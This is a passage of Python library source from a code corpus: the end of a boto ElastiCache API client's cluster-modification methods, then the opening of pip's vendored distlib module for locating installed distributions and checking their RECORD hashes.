cache cluster. You can use this operation to change one or
more cluster configuration parameters by specifying the
parameters and the new values.
:type cache_cluster_id: string
:param cache_cluster_id: The cache cluster identifier. This value is
stored as a lowercase string.
:type num_cache_nodes: integer
:param num_cache_nodes: The number of cache nodes that the cache
cluster should have. If the value for NumCacheNodes is greater than
the existing number of cache nodes, then more nodes will be added.
If the value is less than the existing number of cache nodes, then
cache nodes will be removed.
If you are removing cache nodes, you must use the CacheNodeIdsToRemove
parameter to provide the IDs of the specific cache nodes to be
removed.
:type cache_node_ids_to_remove: list
:param cache_node_ids_to_remove: A list of cache node IDs to be
removed. A node ID is a numeric identifier (0001, 0002, etc.). This
parameter is only valid when NumCacheNodes is less than the
existing number of cache nodes. The number of cache node IDs
supplied in this parameter must match the difference between the
existing number of cache nodes in the cluster and the value of
NumCacheNodes in the request.
:type cache_security_group_names: list
:param cache_security_group_names: A list of cache security group names
to authorize on this cache cluster. This change is asynchronously
applied as soon as possible.
This parameter can be used only with clusters that are created outside
of an Amazon Virtual Private Cloud (VPC).
Constraints: Must contain no more than 255 alphanumeric characters.
Must not be "Default".
:type security_group_ids: list
:param security_group_ids: Specifies the VPC Security Groups associated
with the cache cluster.
This parameter can be used only with clusters that are created in an
Amazon Virtual Private Cloud (VPC).
:type preferred_maintenance_window: string
:param preferred_maintenance_window: The weekly time range (in UTC)
during which system maintenance can occur. Note that system
maintenance may result in an outage. This change is made
immediately. If you are moving this window to the current time,
there must be at least 120 minutes between the current time and end
of the window to ensure that pending changes are applied.
:type notification_topic_arn: string
:param notification_topic_arn:
The Amazon Resource Name (ARN) of the SNS topic to which notifications
will be sent.
The SNS topic owner must be same as the cache cluster owner.
:type cache_parameter_group_name: string
:param cache_parameter_group_name: The name of the cache parameter
group to apply to this cache cluster. This change is asynchronously
applied as soon as possible for parameters when the
ApplyImmediately parameter is specified as true for this request.
:type notification_topic_status: string
:param notification_topic_status: The status of the Amazon SNS
notification topic. Notifications are sent only if the status is
active .
Valid values: `active` | `inactive`
:type apply_immediately: boolean
:param apply_immediately: If `True`, this parameter causes the
modifications in this request and any pending modifications to be
applied, asynchronously and as soon as possible, regardless of the
PreferredMaintenanceWindow setting for the cache cluster.
If `False`, then changes to the cache cluster are applied on the next
maintenance reboot, or the next failure reboot, whichever occurs
first.
Valid values: `True` | `False`
Default: `False`
:type engine_version: string
:param engine_version: The upgraded version of the cache engine to be
run on the cache cluster nodes.
:type auto_minor_version_upgrade: boolean
:param auto_minor_version_upgrade: If `True`, then minor engine
upgrades will be applied automatically to the cache cluster during
the maintenance window.
Valid values: `True` | `False`
Default: `True`
"""
params = {'CacheClusterId': cache_cluster_id, }
if num_cache_nodes is not None:
params['NumCacheNodes'] = num_cache_nodes
if cache_node_ids_to_remove is not None:
self.build_list_params(params,
cache_node_ids_to_remove,
'CacheNodeIdsToRemove.member')
if cache_security_group_names is not None:
self.build_list_params(params,
cache_security_group_names,
'CacheSecurityGroupNames.member')
if security_group_ids is not None:
self.build_list_params(params,
security_group_ids,
'SecurityGroupIds.member')
if preferred_maintenance_window is not None:
params['PreferredMaintenanceWindow'] = preferred_maintenance_window
if notification_topic_arn is not None:
params['NotificationTopicArn'] = notification_topic_arn
if cache_parameter_group_name is not None:
params['CacheParameterGroupName'] = cache_parameter_group_name
if notification_topic_status is not None:
params['NotificationTopicStatus'] = notification_topic_status
if apply_immediately is not None:
params['ApplyImmediately'] = str(
apply_immediately).lower()
if engine_version is not None:
params['EngineVersion'] = engine_version
if auto_minor_version_upgrade is not None:
params['AutoMinorVersionUpgrade'] = str(
auto_minor_version_upgrade).lower()
return self._make_request(
action='ModifyCacheCluster',
verb='POST',
path='/', params=params)
def modify_cache_parameter_group(self, cache_parameter_group_name,
parameter_name_values):
"""
The ModifyCacheParameterGroup operation modifies the
parameters of a cache parameter group. You can modify up to 20
parameters in a single request by submitting a list parameter
name and value pairs.
:type cache_parameter_group_name: string
:param cache_parameter_group_name: The name of the cache parameter
group to modify.
:type parameter_name_values: list
:param parameter_name_values: An array of parameter names and values
for the parameter update. You must supply at least one parameter
name and value; subsequent arguments are optional. A maximum of 20
parameters may be modified per request.
"""
params = {
'CacheParameterGroupName': cache_parameter_group_name,
}
self.build_complex_list_params(
params, parameter_name_values,
'ParameterNameValues.member',
('ParameterName', 'ParameterValue'))
return self._make_request(
action='ModifyCacheParameterGroup',
verb='POST',
path='/', params=params)
def modify_cache_subnet_group(self, cache_subnet_group_name,
cache_subnet_group_description=None,
subnet_ids=None):
"""
The ModifyCacheSubnetGroup operation modifies an existing
cache subnet group.
:type cache_subnet_group_name: string
:param cache_subnet_group_name: The name for the cache subnet group.
This value is stored as a lowercase string.
Constraints: Must contain no more than 255 alphanumeric characters or
hyphens.
Example: `mysubnetgroup`
:type cache_subnet_group_description: string
:param cache_subnet_group_description: A description for the cache
subnet group.
:type subnet_ids: list
:param subnet_ids: The EC2 subnet IDs for the cache subnet group.
"""
params = {'CacheSubnetGroupName': cache_subnet_group_name, }
if cache_subnet_group_description is not None:
params['CacheSubnetGroupDescription'] = cache_subnet_group_description
if subnet_ids is not None:
self.build_list_params(params,
subnet_ids,
'SubnetIds.member')
return self._make_request(
action='ModifyCacheSubnetGroup',
verb='POST',
path='/', params=params)
def modify_replication_group(self, replication_group_id,
replication_group_description=None,
cache_security_group_names=None,
security_group_ids=None,
preferred_maintenance_window=None,
notification_topic_arn=None,
cache_parameter_group_name=None,
notification_topic_status=None,
apply_immediately=None, engine_version=None,
auto_minor_version_upgrade=None,
primary_cluster_id=None):
"""
The ModifyReplicationGroup operation modifies the settings for
a replication group.
:type replication_group_id: string
:param replication_group_id: The identifier of the replication group to
modify.
:type replication_group_description: string
:param replication_group_description: A description for the replication
group. Maximum length is 255 characters.
:type cache_security_group_names: list
:param cache_security_group_names: A list of cache security group names
to authorize for the clusters in this replication group. This
change is asynchronously applied as soon as possible.
This parameter can be used only with replication groups containing
cache clusters running outside of an Amazon Virtual Private Cloud
(VPC).
Constraints: Must contain no more than 255 alphanumeric characters.
Must not be "Default".
:type security_group_ids: list
:param security_group_ids: Specifies the VPC Security Groups associated
with the cache clusters in the replication group.
This parameter can be used only with replication groups containing
cache clusters running in an Amazon Virtual Private Cloud (VPC).
:type preferred_maintenance_window: string
:param preferred_maintenance_window: The weekly time range (in UTC)
during which replication group system maintenance can occur. Note
that system maintenance may result in an outage. This change is
made immediately. If you are moving this window to the current
time, there must be at least 120 minutes between the current time
and end of the window to ensure that pending changes are applied.
:type notification_topic_arn: string
:param notification_topic_arn:
The Amazon Resource Name (ARN) of the SNS topic to which notifications
will be sent.
The SNS topic owner must be same as the replication group owner.
:type cache_parameter_group_name: string
:param cache_parameter_group_name: The name of the cache parameter
group to apply to all of the cache nodes in this replication group.
This change is asynchronously applied as soon as possible for
parameters when the ApplyImmediately parameter is specified as true
for this request.
:type notification_topic_status: string
:param notification_topic_status: The status of the Amazon SNS
notification topic for the replication group. Notifications are
sent only if the status is active .
Valid values: `active` | `inactive`
:type apply_immediately: boolean
:param apply_immediately: If `True`, this parameter causes the
modifications in this request and any pending modifications to be
applied, asynchronously and as soon as possible, regardless of the
PreferredMaintenanceWindow setting for the replication group.
If `False`, then changes to the nodes in the replication group are
applied on the next maintenance reboot, or the next failure reboot,
whichever occurs first.
Valid values: `True` | `False`
Default: `False`
:type engine_version: string
:param engine_version: The upgraded version of the cache engine to be
run on the nodes in the replication group..
:type auto_minor_version_upgrade: boolean
:param auto_minor_version_upgrade: Determines whether minor engine
upgrades will be applied automatically to all of the cache nodes in
the replication group during the maintenance window. A value of
`True` allows these upgrades to occur; `False` disables automatic
upgrades.
:type primary_cluster_id: string
:param primary_cluster_id: If this parameter is specified, ElastiCache
will promote each of the nodes in the specified cache cluster to
the primary role. The nodes of all other clusters in the
replication group will be read replicas.
"""
params = {'ReplicationGroupId': replication_group_id, }
if replication_group_description is not None:
params['ReplicationGroupDescription'] = replication_group_description
if cache_security_group_names is not None:
self.build_list_params(params,
cache_security_group_names,
'CacheSecurityGroupNames.member')
if security_group_ids is not None:
self.build_list_params(params,
security_group_ids,
'SecurityGroupIds.member')
if preferred_maintenance_window is not None:
params['PreferredMaintenanceWindow'] = preferred_maintenance_window
if notification_topic_arn is not None:
params['NotificationTopicArn'] = notification_topic_arn
if cache_parameter_group_name is not None:
params['CacheParameterGroupName'] = cache_parameter_group_name
if notification_topic_status is not None:
params['NotificationTopicStatus'] = notification_topic_status
if apply_immediately is not None:
params['ApplyImmediately'] = str(
apply_immediately).lower()
if engine_version is not None:
params['EngineVersion'] = engine_version
if auto_minor_version_upgrade is not None:
params['AutoMinorVersionUpgrade'] = str(
auto_minor_version_upgrade).lower()
if primary_cluster_id is not None:
params['PrimaryClusterId'] = primary_cluster_id
return self._make_request(
action='ModifyReplicationGroup',
verb='POST',
path='/', params=params)
def purchase_reserved_cache_nodes_offering(self,
reserved_cache_nodes_offering_id,
reserved_cache_node_id=None,
cache_node_count=None):
"""
The PurchaseReservedCacheNodesOffering operation allows you to
purchase a reserved cache node offering.
:type reserved_cache_nodes_offering_id: string
:param reserved_cache_nodes_offering_id: The ID of the reserved cache
node offering to purchase.
Example: 438012d3-4052-4cc7-b2e3-8d3372e0e706
:type reserved_cache_node_id: string
:param reserved_cache_node_id: A customer-specified identifier to track
this reservation.
Example: myreservationID
:type cache_node_count: integer
:param cache_node_count: The number of cache node instances to reserve.
Default: `1`
"""
params = {
'ReservedCacheNodesOfferingId': reserved_cache_nodes_offering_id,
}
if reserved_cache_node_id is not None:
params['ReservedCacheNodeId'] = reserved_cache_node_id
if cache_node_count is not None:
params['CacheNodeCount'] = cache_node_count
return self._make_request(
action='PurchaseReservedCacheNodesOffering',
verb='POST',
path='/', params=params)
def reboot_cache_cluster(self, cache_cluster_id,
cache_node_ids_to_reboot):
"""
The RebootCacheCluster operation reboots some, or all, of the
cache cluster nodes within a provisioned cache cluster. This
API will apply any modified cache parameter groups to the
cache cluster. The reboot action takes place as soon as
possible, and results in a momentary outage to the cache
cluster. During the reboot, the cache cluster status is set to
REBOOTING.
The reboot causes the contents of the cache (for each cache
cluster node being rebooted) to be lost.
When the reboot is complete, a cache cluster event is created.
:type cache_cluster_id: string
:param cache_cluster_id: The cache cluster identifier. This parameter
is stored as a lowercase string.
:type cache_node_ids_to_reboot: list
:param cache_node_ids_to_reboot: A list of cache cluster node IDs to
reboot. A node ID is a numeric identifier (0001, 0002, etc.). To
reboot an entire cache cluster, specify all of the cache cluster
node IDs.
"""
params = {'CacheClusterId': cache_cluster_id, }
self.build_list_params(params,
cache_node_ids_to_reboot,
'CacheNodeIdsToReboot.member')
return self._make_request(
action='RebootCacheCluster',
verb='POST',
path='/', params=params)
def reset_cache_parameter_group(self, cache_parameter_group_name,
parameter_name_values,
reset_all_parameters=None):
"""
The ResetCacheParameterGroup operation modifies the parameters
of a cache parameter group to the engine or system default
value. You can reset specific parameters by submitting a list
of parameter names. To reset the entire cache parameter group,
specify the ResetAllParameters and CacheParameterGroupName
parameters.
:type cache_parameter_group_name: string
:param cache_parameter_group_name: The name of the cache parameter
group to reset.
:type reset_all_parameters: boolean
:param reset_all_parameters: If true , all parameters in the cache
parameter group will be reset to default values. If false , no such
action occurs.
Valid values: `True` | `False`
:type parameter_name_values: list
:param parameter_name_values: An array of parameter names to be reset.
If you are not resetting the entire cache parameter group, you must
specify at least one parameter name.
"""
params = {
'CacheParameterGroupName': cache_parameter_group_name,
}
self.build_complex_list_params(
params, parameter_name_values,
'ParameterNameValues.member',
('ParameterName', 'ParameterValue'))
if reset_all_parameters is not None:
params['ResetAllParameters'] = str(
reset_all_parameters).lower()
return self._make_request(
action='ResetCacheParameterGroup',
verb='POST',
path='/', params=params)
def revoke_cache_security_group_ingress(self, cache_security_group_name,
ec2_security_group_name,
ec2_security_group_owner_id):
"""
The RevokeCacheSecurityGroupIngress operation revokes ingress
from a cache security group. Use this operation to disallow
access from an Amazon EC2 security group that had been
previously authorized.
:type cache_security_group_name: string
:param cache_security_group_name: The name of the cache security group
to revoke ingress from.
:type ec2_security_group_name: string
:param ec2_security_group_name: The name of the Amazon EC2 security
group to revoke access from.
:type ec2_security_group_owner_id: string
:param ec2_security_group_owner_id: The AWS account number of the
Amazon EC2 security group owner. Note that this is not the same
thing as an AWS access key ID - you must provide a valid AWS
account number for this parameter.
"""
params = {
'CacheSecurityGroupName': cache_security_group_name,
'EC2SecurityGroupName': ec2_security_group_name,
'EC2SecurityGroupOwnerId': ec2_security_group_owner_id,
}
return self._make_request(
action='RevokeCacheSecurityGroupIngress',
verb='POST',
path='/', params=params)
def _make_request(self, action, verb, path, params):
params['ContentType'] = 'JSON'
response = self.make_request(action=action, verb='POST',
path='/', params=params)
body = response.read().decode('utf-8')
boto.log.debug(body)
if response.status == 200:
return json.loads(body)
else:
raise self.ResponseError(response.status, response.reason, body)
|
bsd-3-clause
|
kastriothaliti/techstitution
|
venv/lib/python3.5/site-packages/pip/_vendor/distlib/database.py
|
334
|
49672
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2016 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
"""PEP 376 implementation."""
from __future__ import unicode_literals
import base64
import codecs
import contextlib
import hashlib
import logging
import os
import posixpath
import sys
import zipimport
from . import DistlibException, resources
from .compat import StringIO
from .version import get_scheme, UnsupportedVersionError
from .metadata import Metadata, METADATA_FILENAME, WHEEL_METADATA_FILENAME
from .util import (parse_requirement, cached_property, parse_name_and_version,
read_exports, write_exports, CSVReader, CSVWriter)
__all__ = ['Distribution', 'BaseInstalledDistribution',
'InstalledDistribution', 'EggInfoDistribution',
'DistributionPath']
logger = logging.getLogger(__name__)
EXPORTS_FILENAME = 'pydist-exports.json'
COMMANDS_FILENAME = 'pydist-commands.json'
DIST_FILES = ('INSTALLER', METADATA_FILENAME, 'RECORD', 'REQUESTED',
'RESOURCES', EXPORTS_FILENAME, 'SHARED')
DISTINFO_EXT = '.dist-info'
class _Cache(object):
"""
A simple cache mapping names and .dist-info paths to distributions
"""
def __init__(self):
"""
Initialise an instance. There is normally one for each DistributionPath.
"""
self.name = {}
self.path = {}
self.generated = False
def clear(self):
"""
Clear the cache, setting it to its initial state.
"""
self.name.clear()
self.path.clear()
self.generated = False
def add(self, dist):
"""
Add a distribution to the cache.
:param dist: The distribution to add.
"""
if dist.path not in self.path:
self.path[dist.path] = dist
self.name.setdefault(dist.key, []).append(dist)
class DistributionPath(object):
"""
Represents a set of distributions installed on a path (typically sys.path).
"""
def __init__(self, path=None, include_egg=False):
"""
Create an instance from a path, optionally including legacy (distutils/
setuptools/distribute) distributions.
:param path: The path to use, as a list of directories. If not specified,
sys.path is used.
:param include_egg: If True, this instance will look for and return legacy
distributions as well as those based on PEP 376.
"""
if path is None:
path = sys.path
self.path = path
self._include_dist = True
self._include_egg = include_egg
self._cache = _Cache()
self._cache_egg = _Cache()
self._cache_enabled = True
self._scheme = get_scheme('default')
def _get_cache_enabled(self):
return self._cache_enabled
def _set_cache_enabled(self, value):
self._cache_enabled = value
cache_enabled = property(_get_cache_enabled, _set_cache_enabled)
def clear_cache(self):
"""
Clears the internal cache.
"""
self._cache.clear()
self._cache_egg.clear()
def _yield_distributions(self):
"""
Yield .dist-info and/or .egg(-info) distributions.
"""
# We need to check if we've seen some resources already, because on
# some Linux systems (e.g. some Debian/Ubuntu variants) there are
# symlinks which alias other files in the environment.
seen = set()
for path in self.path:
finder = resources.finder_for_path(path)
if finder is None:
continue
r = finder.find('')
if not r or not r.is_container:
continue
rset = sorted(r.resources)
for entry in rset:
r = finder.find(entry)
if not r or r.path in seen:
continue
if self._include_dist and entry.endswith(DISTINFO_EXT):
possible_filenames = [METADATA_FILENAME, WHEEL_METADATA_FILENAME]
for metadata_filename in possible_filenames:
metadata_path = posixpath.join(entry, metadata_filename)
pydist = finder.find(metadata_path)
if pydist:
break
else:
continue
with contextlib.closing(pydist.as_stream()) as stream:
metadata = Metadata(fileobj=stream, scheme='legacy')
logger.debug('Found %s', r.path)
seen.add(r.path)
yield new_dist_class(r.path, metadata=metadata,
env=self)
elif self._include_egg and entry.endswith(('.egg-info',
'.egg')):
logger.debug('Found %s', r.path)
seen.add(r.path)
yield old_dist_class(r.path, self)
def _generate_cache(self):
"""
Scan the path for distributions and populate the cache with
those that are found.
"""
gen_dist = not self._cache.generated
gen_egg = self._include_egg and not self._cache_egg.generated
if gen_dist or gen_egg:
for dist in self._yield_distributions():
if isinstance(dist, InstalledDistribution):
self._cache.add(dist)
else:
self._cache_egg.add(dist)
if gen_dist:
self._cache.generated = True
if gen_egg:
self._cache_egg.generated = True
@classmethod
def distinfo_dirname(cls, name, version):
"""
The *name* and *version* parameters are converted into their
filename-escaped form, i.e. any ``'-'`` characters are replaced
with ``'_'`` other than the one in ``'dist-info'`` and the one
separating the name from the version number.
:parameter name: is converted to a standard distribution name by replacing
any runs of non- alphanumeric characters with a single
``'-'``.
:type name: string
:parameter version: is converted to a standard version string. Spaces
become dots, and all other non-alphanumeric characters
(except dots) become dashes, with runs of multiple
dashes condensed to a single dash.
:type version: string
:returns: directory name
:rtype: string"""
name = name.replace('-', '_')
return '-'.join([name, version]) + DISTINFO_EXT
def get_distributions(self):
"""
Provides an iterator that looks for distributions and returns
:class:`InstalledDistribution` or
:class:`EggInfoDistribution` instances for each one of them.
:rtype: iterator of :class:`InstalledDistribution` and
:class:`EggInfoDistribution` instances
"""
if not self._cache_enabled:
for dist in self._yield_distributions():
yield dist
else:
self._generate_cache()
for dist in self._cache.path.values():
yield dist
if self._include_egg:
for dist in self._cache_egg.path.values():
yield dist
def get_distribution(self, name):
"""
Looks for a named distribution on the path.
This function only returns the first result found, as no more than one
value is expected. If nothing is found, ``None`` is returned.
:rtype: :class:`InstalledDistribution`, :class:`EggInfoDistribution`
or ``None``
"""
result = None
name = name.lower()
if not self._cache_enabled:
for dist in self._yield_distributions():
if dist.key == name:
result = dist
break
else:
self._generate_cache()
if name in self._cache.name:
result = self._cache.name[name][0]
elif self._include_egg and name in self._cache_egg.name:
result = self._cache_egg.name[name][0]
return result
def provides_distribution(self, name, version=None):
"""
Iterates over all distributions to find which distributions provide *name*.
If a *version* is provided, it will be used to filter the results.
This function only returns the first result found, since no more than
one values are expected. If the directory is not found, returns ``None``.
:parameter version: a version specifier that indicates the version
required, conforming to the format in ``PEP-345``
:type name: string
:type version: string
"""
matcher = None
if not version is None:
try:
matcher = self._scheme.matcher('%s (%s)' % (name, version))
except ValueError:
raise DistlibException('invalid name or version: %r, %r' %
(name, version))
for dist in self.get_distributions():
provided = dist.provides
for p in provided:
p_name, p_ver = parse_name_and_version(p)
if matcher is None:
if p_name == name:
yield dist
break
else:
if p_name == name and matcher.match(p_ver):
yield dist
break
def get_file_path(self, name, relative_path):
"""
Return the path to a resource file.
"""
dist = self.get_distribution(name)
if dist is None:
raise LookupError('no distribution named %r found' % name)
return dist.get_resource_path(relative_path)
def get_exported_entries(self, category, name=None):
"""
Return all of the exported entries in a particular category.
:param category: The category to search for entries.
:param name: If specified, only entries with that name are returned.
"""
for dist in self.get_distributions():
r = dist.exports
if category in r:
d = r[category]
if name is not None:
if name in d:
yield d[name]
else:
for v in d.values():
yield v
class Distribution(object):
"""
A base class for distributions, whether installed or from indexes.
Either way, it must have some metadata, so that's all that's needed
for construction.
"""
build_time_dependency = False
"""
Set to True if it's known to be only a build-time dependency (i.e.
not needed after installation).
"""
requested = False
"""A boolean that indicates whether the ``REQUESTED`` metadata file is
present (in other words, whether the package was installed by user
request or it was installed as a dependency)."""
def __init__(self, metadata):
"""
Initialise an instance.
:param metadata: The instance of :class:`Metadata` describing this
distribution.
"""
self.metadata = metadata
self.name = metadata.name
self.key = self.name.lower() # for case-insensitive comparisons
self.version = metadata.version
self.locator = None
self.digest = None
self.extras = None # additional features requested
self.context = None # environment marker overrides
self.download_urls = set()
self.digests = {}
@property
def source_url(self):
"""
The source archive download URL for this distribution.
"""
return self.metadata.source_url
download_url = source_url # Backward compatibility
@property
def name_and_version(self):
"""
A utility property which displays the name and version in parentheses.
"""
return '%s (%s)' % (self.name, self.version)
@property
def provides(self):
"""
A set of distribution names and versions provided by this distribution.
:return: A set of "name (version)" strings.
"""
plist = self.metadata.provides
s = '%s (%s)' % (self.name, self.version)
if s not in plist:
plist.append(s)
return plist
def _get_requirements(self, req_attr):
md = self.metadata
logger.debug('Getting requirements from metadata %r', md.todict())
reqts = getattr(md, req_attr)
return set(md.get_requirements(reqts, extras=self.extras,
env=self.context))
@property
def run_requires(self):
return self._get_requirements('run_requires')
@property
def meta_requires(self):
return self._get_requirements('meta_requires')
@property
def build_requires(self):
return self._get_requirements('build_requires')
@property
def test_requires(self):
return self._get_requirements('test_requires')
@property
def dev_requires(self):
return self._get_requirements('dev_requires')
def matches_requirement(self, req):
"""
Say if this instance matches (fulfills) a requirement.
:param req: The requirement to match.
:rtype req: str
:return: True if it matches, else False.
"""
# Requirement may contain extras - parse to lose those
# from what's passed to the matcher
r = parse_requirement(req)
scheme = get_scheme(self.metadata.scheme)
try:
matcher = scheme.matcher(r.requirement)
except UnsupportedVersionError:
# XXX compat-mode if cannot read the version
logger.warning('could not read version %r - using name only',
req)
name = req.split()[0]
matcher = scheme.matcher(name)
name = matcher.key # case-insensitive
result = False
for p in self.provides:
p_name, p_ver = parse_name_and_version(p)
if p_name != name:
continue
try:
result = matcher.match(p_ver)
break
except UnsupportedVersionError:
pass
return result
def __repr__(self):
"""
Return a textual representation of this instance,
"""
if self.source_url:
suffix = ' [%s]' % self.source_url
else:
suffix = ''
return '<Distribution %s (%s)%s>' % (self.name, self.version, suffix)
def __eq__(self, other):
"""
See if this distribution is the same as another.
:param other: The distribution to compare with. To be equal to one
another. distributions must have the same type, name,
version and source_url.
:return: True if it is the same, else False.
"""
if type(other) is not type(self):
result = False
else:
result = (self.name == other.name and
self.version == other.version and
self.source_url == other.source_url)
return result
def __hash__(self):
"""
Compute hash in a way which matches the equality test.
"""
return hash(self.name) + hash(self.version) + hash(self.source_url)
class BaseInstalledDistribution(Distribution):
"""
This is the base class for installed distributions (whether PEP 376 or
legacy).
"""
hasher = None
def __init__(self, metadata, path, env=None):
"""
Initialise an instance.
:param metadata: An instance of :class:`Metadata` which describes the
distribution. This will normally have been initialised
from a metadata file in the ``path``.
:param path: The path of the ``.dist-info`` or ``.egg-info``
directory for the distribution.
:param env: This is normally the :class:`DistributionPath`
instance where this distribution was found.
"""
super(BaseInstalledDistribution, self).__init__(metadata)
self.path = path
self.dist_path = env
def get_hash(self, data, hasher=None):
"""
Get the hash of some data, using a particular hash algorithm, if
specified.
:param data: The data to be hashed.
:type data: bytes
:param hasher: The name of a hash implementation, supported by hashlib,
or ``None``. Examples of valid values are ``'sha1'``,
``'sha224'``, ``'sha384'``, '``sha256'``, ``'md5'`` and
``'sha512'``. If no hasher is specified, the ``hasher``
attribute of the :class:`InstalledDistribution` instance
is used. If the hasher is determined to be ``None``, MD5
is used as the hashing algorithm.
:returns: The hash of the data. If a hasher was explicitly specified,
the returned hash will be prefixed with the specified hasher
followed by '='.
:rtype: str
"""
if hasher is None:
hasher = self.hasher
if hasher is None:
hasher = hashlib.md5
prefix = ''
else:
hasher = getattr(hashlib, hasher)
prefix = '%s=' % self.hasher
digest = hasher(data).digest()
digest = base64.urlsafe_b64encode(digest).rstrip(b'=').decode('ascii')
return '%s%s' % (prefix, digest)
class InstalledDistribution(BaseInstalledDistribution):
"""
Created with the *path* of the ``.dist-info`` directory provided to the
constructor. It reads the metadata contained in ``pydist.json`` when it is
instantiated., or uses a passed in Metadata instance (useful for when
dry-run mode is being used).
"""
hasher = 'sha256'
def __init__(self, path, metadata=None, env=None):
self.finder = finder = resources.finder_for_path(path)
if finder is None:
import pdb; pdb.set_trace ()
if env and env._cache_enabled and path in env._cache.path:
metadata = env._cache.path[path].metadata
elif metadata is None:
r = finder.find(METADATA_FILENAME)
# Temporary - for Wheel 0.23 support
if r is None:
r = finder.find(WHEEL_METADATA_FILENAME)
# Temporary - for legacy support
if r is None:
r = finder.find('METADATA')
if r is None:
raise ValueError('no %s found in %s' % (METADATA_FILENAME,
path))
with contextlib.closing(r.as_stream()) as stream:
metadata = Metadata(fileobj=stream, scheme='legacy')
super(InstalledDistribution, self).__init__(metadata, path, env)
if env and env._cache_enabled:
env._cache.add(self)
try:
r = finder.find('REQUESTED')
except AttributeError:
import pdb; pdb.set_trace ()
self.requested = r is not None
def __repr__(self):
return '<InstalledDistribution %r %s at %r>' % (
self.name, self.version, self.path)
def __str__(self):
return "%s %s" % (self.name, self.version)
def _get_records(self):
"""
Get the list of installed files for the distribution
:return: A list of tuples of path, hash and size. Note that hash and
size might be ``None`` for some entries. The path is exactly
as stored in the file (which is as in PEP 376).
"""
results = []
r = self.get_distinfo_resource('RECORD')
with contextlib.closing(r.as_stream()) as stream:
with CSVReader(stream=stream) as record_reader:
# Base location is parent dir of .dist-info dir
#base_location = os.path.dirname(self.path)
#base_location = os.path.abspath(base_location)
for row in record_reader:
missing = [None for i in range(len(row), 3)]
path, checksum, size = row + missing
#if not os.path.isabs(path):
# path = path.replace('/', os.sep)
# path = os.path.join(base_location, path)
results.append((path, checksum, size))
return results
@cached_property
def exports(self):
"""
Return the information exported by this distribution.
:return: A dictionary of exports, mapping an export category to a dict
of :class:`ExportEntry` instances describing the individual
export entries, and keyed by name.
"""
result = {}
r = self.get_distinfo_resource(EXPORTS_FILENAME)
if r:
result = self.read_exports()
return result
def read_exports(self):
"""
Read exports data from a file in .ini format.
:return: A dictionary of exports, mapping an export category to a list
of :class:`ExportEntry` instances describing the individual
export entries.
"""
result = {}
r = self.get_distinfo_resource(EXPORTS_FILENAME)
if r:
with contextlib.closing(r.as_stream()) as stream:
result = read_exports(stream)
return result
def write_exports(self, exports):
"""
Write a dictionary of exports to a file in .ini format.
:param exports: A dictionary of exports, mapping an export category to
a list of :class:`ExportEntry` instances describing the
individual export entries.
"""
rf = self.get_distinfo_file(EXPORTS_FILENAME)
with open(rf, 'w') as f:
write_exports(exports, f)
def get_resource_path(self, relative_path):
"""
NOTE: This API may change in the future.
Return the absolute path to a resource file with the given relative
path.
:param relative_path: The path, relative to .dist-info, of the resource
of interest.
:return: The absolute path where the resource is to be found.
"""
r = self.get_distinfo_resource('RESOURCES')
with contextlib.closing(r.as_stream()) as stream:
with CSVReader(stream=stream) as resources_reader:
for relative, destination in resources_reader:
if relative == relative_path:
return destination
raise KeyError('no resource file with relative path %r '
'is installed' % relative_path)
def list_installed_files(self):
"""
Iterates over the ``RECORD`` entries and returns a tuple
``(path, hash, size)`` for each line.
:returns: iterator of (path, hash, size)
"""
for result in self._get_records():
yield result
def write_installed_files(self, paths, prefix, dry_run=False):
"""
Writes the ``RECORD`` file, using the ``paths`` iterable passed in. Any
existing ``RECORD`` file is silently overwritten.
prefix is used to determine when to write absolute paths.
"""
prefix = os.path.join(prefix, '')
base = os.path.dirname(self.path)
base_under_prefix = base.startswith(prefix)
base = os.path.join(base, '')
record_path = self.get_distinfo_file('RECORD')
logger.info('creating %s', record_path)
if dry_run:
return None
with CSVWriter(record_path) as writer:
for path in paths:
if os.path.isdir(path) or path.endswith(('.pyc', '.pyo')):
# do not put size and hash, as in PEP-376
hash_value = size = ''
else:
size = '%d' % os.path.getsize(path)
with open(path, 'rb') as fp:
hash_value = self.get_hash(fp.read())
if path.startswith(base) or (base_under_prefix and
path.startswith(prefix)):
path = os.path.relpath(path, base)
writer.writerow((path, hash_value, size))
# add the RECORD file itself
if record_path.startswith(base):
record_path = os.path.relpath(record_path, base)
writer.writerow((record_path, '', ''))
return record_path
def check_installed_files(self):
"""
Checks that the hashes and sizes of the files in ``RECORD`` are
matched by the files themselves. Returns a (possibly empty) list of
mismatches. Each entry in the mismatch list will be a tuple consisting
of the path, 'exists', 'size' or 'hash' according to what didn't match
(existence is checked first, then size, then hash), the expected
value and the actual value.
"""
mismatches = []
base = os.path.dirname(self.path)
record_path = self.get_distinfo_file('RECORD')
for path, hash_value, size in self.list_installed_files():
if not os.path.isabs(path):
path = os.path.join(base, path)
if path == record_path:
continue
if not os.path.exists(path):
mismatches.append((path, 'exists', True, False))
elif os.path.isfile(path):
actual_size = str(os.path.getsize(path))
if size and actual_size != size:
mismatches.append((path, 'size', size, actual_size))
elif hash_value:
if '=' in hash_value:
hasher = hash_value.split('=', 1)[0]
else:
hasher = None
with open(path, 'rb') as f:
actual_hash = self.get_hash(f.read(), hasher)
if actual_hash != hash_value:
mismatches.append((path, 'hash', hash_value, actual_hash))
return mismatches
@cached_property
def shared_locations(self):
"""
A dictionary of shared locations whose keys are in the set 'prefix',
'purelib', 'platlib', 'scripts', 'headers', 'data' and 'namespace'.
The corresponding value is the absolute path of that category for
this distribution, and takes into account any paths selected by the
user at installation time (e.g. via command-line arguments). In the
case of the 'namespace' key, this would be a list of absolute paths
for the roots of namespace packages in this distribution.
The first time this property is accessed, the relevant information is
read from the SHARED file in the .dist-info directory.
"""
result = {}
shared_path = os.path.join(self.path, 'SHARED')
if os.path.isfile(shared_path):
with codecs.open(shared_path, 'r', encoding='utf-8') as f:
lines = f.read().splitlines()
for line in lines:
key, value = line.split('=', 1)
if key == 'namespace':
result.setdefault(key, []).append(value)
else:
result[key] = value
return result
def write_shared_locations(self, paths, dry_run=False):
"""
Write shared location information to the SHARED file in .dist-info.
:param paths: A dictionary as described in the documentation for
:meth:`shared_locations`.
:param dry_run: If True, the action is logged but no file is actually
written.
:return: The path of the file written to.
"""
shared_path = os.path.join(self.path, 'SHARED')
logger.info('creating %s', shared_path)
if dry_run:
return None
lines = []
for key in ('prefix', 'lib', 'headers', 'scripts', 'data'):
path = paths[key]
if os.path.isdir(paths[key]):
